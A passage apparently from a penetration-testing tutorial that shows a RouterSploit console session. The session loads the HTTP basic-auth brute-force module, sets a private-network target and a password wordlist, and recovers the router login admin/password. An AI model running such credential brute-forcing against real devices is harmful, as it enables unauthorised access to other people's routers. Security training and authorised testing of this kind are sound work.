rsf (AutoPwn) >

If all else fails, RouterSploit has a number of creds modules that can brute force various services, including HTTP, SSH, and Telnet.

rsf > use creds/http_basic_bruteforce
rsf (HTTP Basic Bruteforce) > show options

Target options:

   Name       Current settings     Description                                              
   ----       ----------------     -----------                                              
   port       80                   Target port                                              
   target                          Target IP address or file with target:port (file://)    


Module options:

   Name          Current settings                                                        Description                                  
   ----          ----------------                                                        -----------                                  
   path          /                                                                       URL Path                                      
   usernames     admin                                                                   Username or file with usernames (file://)    
   passwords     file:///usr/share/routersploit/routersploit/wordlists/passwords.txt     Password or file with passwords (file://)    
   threads       8                                                                       Numbers of threads                            
   verbosity     yes                                                                     Display authentication attempts              


rsf (HTTP Basic Bruteforce) > set target 192.168.0.2
[+] {'target': '192.168.0.2'}
rsf (HTTP Basic Bruteforce) > set passwords file:///usr/share/wordlists/nmap.lst
[+] {'passwords': 'file:///usr/share/wordlists/nmap.lst'}
rsf (HTTP Basic Bruteforce) > set verbosity no
[+] {'verbosity': 'no'}
rsf (HTTP Basic Bruteforce) > run
[*] Running module...
[*] Elapsed time:  1.97385120392 seconds
[+] Credentials found!

   Target          Port     Login     Password    
   ------          ----     -----     --------    
   192.168.0.2     80       admin     password    

rsf (HTTP Basic Bruteforce) >